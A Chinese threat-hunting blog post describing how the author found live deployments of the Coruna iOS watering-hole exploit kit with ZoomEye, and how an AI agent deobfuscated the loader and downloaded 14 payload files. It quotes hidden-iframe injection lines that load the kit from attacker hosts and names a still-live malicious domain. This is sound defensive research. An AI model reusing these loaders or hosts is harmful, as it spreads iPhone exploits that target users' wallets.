文章总结： 文档记录了利用Zoomeye和AiPy分析CorunaiOS漏洞套件的过程。作者通过特征搜索发现未被公开披露的活跃样本，并借助AiPY调用不同大模型解密混淆JS。对比发现Gemini3在处理复杂逻辑任务时优于国产模型，成功还原了包含14个文件的漏洞利用链。文章指出Nday漏洞存在从APT流向黑产的趋势，且AI大模型显著提升了恶意代码分析的效率与便捷性。 综合评分： 90 文章分类： 恶意软件,威胁情报,AI安全,实战经验,安全工具

使用Zoomeye 和 AiPy 捕获 Coruna 样本

原创

heige heige

黑哥虾撩

2026年3月11日 22:29 美国

原本这个应该是放在《AI Agent 下半场》文中的案例，但是考虑到读者可能不是安全相关的，而且可能影响文章整体观点表达，所以就单独记录一下。

Coruna

Google云在March 4, 2026发布了一篇 blog 《Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit》

https://cloud.google.com/blog/topics/threat-intelligence/coruna-powerful-ios-exploit-kit

文章主要解释Google Threat Intelligence Group (GTIG)发现了一个名为“Coruna” 针对 针对运行 iOS 13.0 版本（2019 年 9 月发布）至 17.2.1 版本（2023 年 12 月发布）的 iPhone  水坑攻击套件包，里面包含了五条完整的 iOS 漏洞链和共 23 个漏洞利用。

我开始看到这个时候其实兴趣不是很大的，因为这些都是 nday 了，当然按之前折腾的经验来看，这个 exploit-kit 的开发也是一个比较大的工程的，当然这种武器模式，跟 0day 的武器化模式可以说是截然不同的路线，毕竟要全覆盖并适配那么多 nday 漏洞，而且要求是 full chain。

所以能开发出这种项目的也不会是个简单的角色，从 Google 的文章也有提到，GTIG最早在2025 年发现被用于大毛组织黑二毛的行动中，但是最近这次主要是发现被黑产广泛使用，现在还可以找到不少在线的部署。

这个让我想起了我们之前发现过很多次的 0day 漏洞从 “APT” 转为 “黑产”的路子，比如

https://paper.seebug.org/695/

典型的 0day “堕落3 阶段”，武器化的东西看起来也这样！

只是我比较奇怪的是，这么多年过去了这种水坑攻击的 nday 武器真的有很大的用处吗？在 IE 时代倒是可以通过游戏等来闭环，黑产这个可能是想通过 Web3来实现“商业”闭环，从 Google 的文章里看确实是这样瞄准的还是数字钱包

Hunting

Google 的文章发布后，看到国内社区都很关注这个玩意，很多人都在找样本，其实非常简单，你只要 ZoomEye 上搜一下就行，在 Google 的文章里发布的 ICOs 里的 link：

有很多，简单滑动下发现/88k4ez/group.html 这个用的比较多，而且这个88k4ez很明显的特征，所以你就直接搜索 /88k4ez/group.html 就行了

 简单就找一个：

<iframe&nbsp;src="http://goanalytics.xyz/88k4ez/group.html"&nbsp;style="position: fixed;top:0;width:0;height:0;left:-1000px;border:0"></iframe>

典型的水坑～ ，不过发现这个地址已经在 Google 的文章里 ICOs 列表里，毫无疑问，测试下好像要几个不在线了 …

所以我就换了个 “tuiliu/group.html” 搜索找到 trxusdt.xyz 这个地址在 Google 的文章里并没有覆盖，没错，他还在线。

调用方式：

<iframe&nbsp;src="/tuiliu/group.html"&nbsp;style="position: fixed;top:0;width:0;height:0;left:-1000px;border:0"></iframe>

用的相对路径，当时我第一眼看到这个有点怀疑这个是不是目标页面，因为有很多网站本身正常页面也是这个写法，所以简单 Curl 一下，发现是混淆加密的，看起来有戏这个时候就是 AiPy 上场了

帮我看个/Users/xxxx/aa/group_http.html 这个页面里的混淆的 js 都干了什么 注意是不是有关 ios 的相关的内容

结果如图：

注意模型是 GLM 4.7

看到 “iOS 13-17” 的结论，基本上就可以确定这个多半就是目标了，那么能不能提取出来其他的 payload 呢？如果按历史经验手工一步一步debug 的化还是很累很麻烦并且非常无聊的，当然还有一个办法就是抓包，找一个手机抓个包，手头上没有那么多设备和环境，所以我们继续用 AiPy 把

帮我看个/Users/heige/aa/group_http.html 这个页面里的混淆的 js 帮我分析下这个页面都动态加载了哪些 js

多次测试后，发现glm 4.7没有成功，于是我追加了一些提示：

帮我看个/Users/heige/aa/group_http.html 这个页面里的混淆的 js 帮我分析下这个页面都动态加载了哪些 js，提示：“Bailing out if the device is in

 Lockdown Mode, or the user is in private browsing.

A unique and hard-coded cookie is used along the way to generate resource URLs.

Resources are referred to by a hash, which needs to be derived with the unique cookie using sha256(COOKIE + ID)[:40] to get their URL.”

上面提示词部分来源于 Google 文中的原文，这个也算是个 “skills” 提示吧，可惜有这个提示，结果也不是很理想，而且还不稳定，看了下结果可能还是模型能力的问题，有时候对 cookie 这个词也有“误解”，被认为是浏览器的 cookie 了，于是我换了下 Gemini3 的模型，尝试效果还是非常好的，于是我让 AiPy + Gemini3 一次性帮我线上的页面分析并下载回来：

而且直接镜像到本地了，这样得到了 group.html 混淆的 js 里还动态加载了 14 个 js 文件，其中一个就是 min.js 实际上是一个 二进制文件，其他的 13 是按对应 ios 版本判断记载的对应的漏洞攻击的 Payload，你可以继续让他分析哪些 ios 版本对应哪些 js 加载，及对应模板是干啥的

到这里其实我这个例子算基本完成了，当然在真正恶意分析角度上看还是不够的，因为这个只是水坑攻击的部分，在后续“浏览器”漏洞成功后，可能在对应的 exp 的 shellcode 等里面还有其他下载出发的漏洞或者恶意控制等的组件等等

不过即使是这一步的分析，大模型时代已经让这个分析事情变得非常的简单直接了，另外在复杂任务上，这次其实我 还是测试了很多模型的，国产模型在复杂任务的理解/完成的稳定性等方面还是需要再努力，而国外的顶级模型 gemini/codex 表现都非常好，在神龙叫 杨教主文章《大模型能力评测，中国落后一年》里也提到了我们 AiPy 的模型测试结果是一致的

AiPy 的模型测试报告 www.aipyaipy.com 点击“测评报告”查看

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：黑哥虾撩 heige heige《使用Zoomeye 和 AiPy 捕获 Coruna 样本》